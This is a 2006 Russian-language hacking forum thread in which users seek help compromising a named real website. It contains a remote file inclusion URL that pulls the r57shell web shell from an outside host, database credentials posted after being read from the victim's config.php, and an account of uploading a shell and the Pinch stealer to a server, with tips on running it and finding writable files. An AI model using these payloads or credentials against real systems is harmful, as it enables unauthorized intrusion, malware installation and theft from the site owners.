Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Windows NT & Safe mode (php inj) |

11.07.2006, 15:10
|
|
Познающий
Регистрация: 09.01.2006
Сообщений: 53
Провел на форуме: 285050
Репутация:
16
|
|
Windows NT & Safe mode (php inj)
Ребят... Подскажите как ломать... Я даже php бэкдор залить немогу.
http://www.rtk.it/SQuery/lib/gore.php?libpath=http://rst.void.ru/download/r57shell.txt?
Пасиба =)
|
|
|

11.07.2006, 16:16
|
|
Познающий
Регистрация: 19.04.2006
Сообщений: 40
Провел на форуме: 2905481
Репутация:
47
|
|
Это по-моему не из той оперы
Здесь ошибка вида:
Fatal error: Class gore: Cannot inherit from undefined class gamespy in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 8
А для загрузки шелла нужно чтобы была:
Warning: main(libpat): failed to open stream: No such file or directory in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 13
Warning: main(libpat): Failed opening 'libpat' for inclusion (include_path='.;/usr/local/php/PEAR') in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 1
Может там какая то переменная висела
Последний раз редактировалось zyl; 11.07.2006 в 16:45..
|
|
|

11.07.2006, 20:17
|
|
Познающий
Регистрация: 09.01.2006
Сообщений: 53
Провел на форуме: 285050
Репутация:
16
|
|
Хммм... А обойти-то можно как-нибудь? Что меня достаточно сильно удивило - я не могу нормально ползать по папкам.
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))
|
|
|

11.07.2006, 21:29
|
|
Познающий
Регистрация: 19.04.2006
Сообщений: 40
Провел на форуме: 2905481
Репутация:
47
|
|
Хммм... А обойти-то можно как-нибудь?
Возможно что ошибаюсь, но по моему нет.
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет?
Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php
|
|
|

12.07.2006, 00:13
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
Я как то читал про обход safe_mod но там жопа полная. Единсвенное чё можно пока сделать, так это читать любый файлы...(с помощью php_eval). Вот например небольшой кусок из config.php :
$dbhost = "62.149.150.56";
$dbuname = "Sql103994";
$dbpass = "41ebe44d";
$dbname = "Sql103994_1";
$prefix = "nuke";
$user_prefix = "nuke";
$dbtype = "MySQL";
$sitekey = "S·kQg*ит?^м#@и+~ю-?4Sd5%W@Y6Ђ7“ю2-dm29-.-39.3a8sUf+W9";
$gfx_chk = 7;
$subscription_url = "";
$admin_file = "admin";
$tipath = "images/topics/";
$advanced_editor = 0;
$display_errors = false;
|
|
|

12.07.2006, 01:11
|
|
Познающий
Регистрация: 09.01.2006
Сообщений: 53
Провел на форуме: 285050
Репутация:
16
|
|
Сообщение от Dr.Check
Я как то читал про обход safe_mod но там жопа полная.[/I]
Да это действительно так. Дело все в том, что я даже не знаю как ломать. Хотелось-бы бэкдор залить (просто php файлик как-нить изменить) но вот понять не могу, где я могу писать, а где - нет.
Сообщение от zyl
Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php
Это про chmod. Он в *.nix системах, а в моем случае NT.
|
|
|

08.08.2006, 12:59
|
|
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме: 1095453
Репутация:
113
|
|
У меня анологичное ситуация (( Свервак под NT залил шелл + пинч на комп а вот команда C:\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф
|
|
|

08.08.2006, 14:52
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
У меня анологичное ситуация (( Свервак под NT залил шелл пинч на комп а вот команда C:\\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф
Конечно не отвечаю, что выйдет, но попробуй так:
C:\\ start [путь] x.exe
[путь] до файла...если в этой же дире, то не надо... 
|
|
|

08.08.2006, 19:24
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме: 5887054
Репутация:
1292
|
|
Сообщение от DaemoniZ
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))
Попробуй второй пример в "выполнить пхп код" вставить отсюда fileperms
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|